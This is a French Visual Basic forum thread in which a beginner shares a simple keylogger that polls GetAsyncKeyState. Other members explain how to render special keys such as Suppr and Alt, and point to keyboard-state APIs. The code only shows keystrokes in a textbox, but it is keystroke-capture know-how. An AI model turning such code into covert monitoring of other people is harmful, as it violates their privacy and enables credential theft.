begin process at 2010 02 10 11:27:04
  Trouver un code source :

dans

Accueil > Forum > 

Visual Basic 6

> 

Divers

> 

Débutants

> 

Visualises(alt/shift/suppr..)dans un keylooger ?

Derniers messages déposésPoser une question dans le forum ou lancer une discussion

Visualises(alt/shift/suppr..)dans un keylooger ?

vendredi 7 novembre 2008 à 20:57:22 | Visualises(alt/shift/suppr..)dans un keylooger ?

jihednond

@§§IloveVB§§@

Bonjour tout le monde

J'est créer un simple  keyloger (pour surveillé mon pc) avec la commande GetAsyncKeyState(i) mes le problème c'est que

Les touche (alt suppr clrl. ) son représenté sous forme d'un caractère bizarre il a-t-il une solution pour  les

Visualises  ?

Code:

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

Private Sub Timer1_Timer()

Dim result As Integer

For i = 1 To 255

result = 0

result = GetAsyncKeyState(i)

If result = -32767 Then

Text1.Text = Text1.Text + Chr(i)

End If

Next i

End Sub

Remarque

si se code est contre le règlements du forum acceptez tout mes excuse

car mon but et de créer un logiciel pour protéger mon petit frère contre

les site illégal    

vendredi 7 novembre 2008 à 21:31:57 | Re : Visualises(alt/shift/suppr..)dans un keylooger ?

debutant VB

Membre Club
Réponse acceptée !
Tu n'as qu'à remplacer

If result = -32767 Then
End If

par

If result = -32767 Then
    Text1.Text = Text1.Text + Cstr(i) + ";"
End If

pour savoir le code des touches appuyées.
Il ne te reste plus qu'à régler toi-même les cas spéciaux :

If result = -32767 Then
    Select Case i
        Case 46:
            Text1.Text = Text1.Text + "[Suppr]"
        Case Else:
    End Select
End If

etc ...
(Attention, certaines autres touches comme alt ... renvoyent plusieurs codes)
J'espère que cette réponse te conviendra.
vendredi 7 novembre 2008 à 22:13:06 | Re : Visualises(alt/shift/suppr..)dans un keylooger ?

jihednond

@§§§merci§§§@

Merci  debutant VB cest intégrant comme solution mes ca retroune les code ascii donc le problème persiste toujours

Encore merci pour ton aide     

samedi 8 novembre 2008 à 07:43:50 | Re : Visualises(alt/shift/suppr..)dans un keylooger ?

Renfield

Administrateur CodeS-SourceS
Réponse acceptée !
non, tu as anregistré un Keystate... (y'a moyen de demander l'etat de toutes les touches d'un coup...)

a toi de restituer un keystate, et non de jouer avec chr(i), qu'i n'est pas la même chose...

http://www.vbfrance.com/code.aspx?ID=33577

et voir APIs GetKeyboardState et SetKeyboardState
samedi 8 novembre 2008 à 10:07:35 | Re : Visualises(alt/shift/suppr..)dans un keylooger ?

jihednond

@§§§résolu§§§@

C'est  exactement ce que je cher cherche  mes je te conseille d'ajouter des commentaire qui aidera

Les débutant a comprendre ton script qui sert a clarifier ton code en fin merci pour ton aide tu est

Le meilleur

samedi 8 novembre 2008 à 13:54:56 | Re : Visualises(alt/shift/suppr..)dans un keylooger ?

Renfield

Administrateur CodeS-SourceS
si question je peux répondre.
la doc des Apis est dispo comme premiere etape de reflexion.

bonne continuation.

Cette discussion est classée dans : alt, style, result, mso, visualises

Répondre à ce message

Sujets en rapport avec ce message

A l'aide :Deploiment d'une application [ par tamort ] salut tous le monde<link re mode de connection à une base de données [ par momoSahli ] <link rel="Fi Filtrer un dataTable [ par momoSahli ] <link rel="Fi tableau croisé dynamique et graphique VB sous Excel [ par audreyP ] bonjour.Je souhaite créer divers graphique. Afin de les faire, je dois créer des tableaux croisé dynamique pour faire une synthèse des données.Je disp tableau croisé dynamique et graphique VB sous Excel [ par audreyP ] bonjour.Je souhaite créer divers graphique. Afin de les faire, je dois créer des tableaux croisé dynamique pour faire une synthèse des données.Je disp Recherche dans ActiveDirectory [ par NeoDarklink ] <link rel="Fi Transfert d'image sans passer par fichier, est-ce possible ? [ par kakenette ] Bonjour je voulais savoir si c'est possible de transférer le contenue d'une PictureBox d'un ordinateur à un autre avec winsock par exemple mais sans p Visualiser un rectangle à partir des coordonnées x y [ par NulleAbsolue ] <link rel="Fi generer objet avec code [ par meoliver ] Bonjour cher developpeur, je suis debutant en programmation. je voudrais savoir si vous pouvez m'aider a :<meta name="Generator" Automate + Suppervision, la galère [ par Jackers ] <link rel="Fi

Nos sponsors

Sondage...

CalendriCode

Février 2010
LMMJVSD
1234567
891011121314
15161718192021
22232425262728

Consulter la suite du CalendriCode

Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel (EBArtSoft), Merci à Vincent pour ses précieux conseils.
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés

Google Coop CodeS-SourceS Google Coop CodeS-SourceS
Temps d'éxécution de la page : 1,014 sec (4)

Nous contacter | Annoncer sur CodeS-SourceS | Mentions légales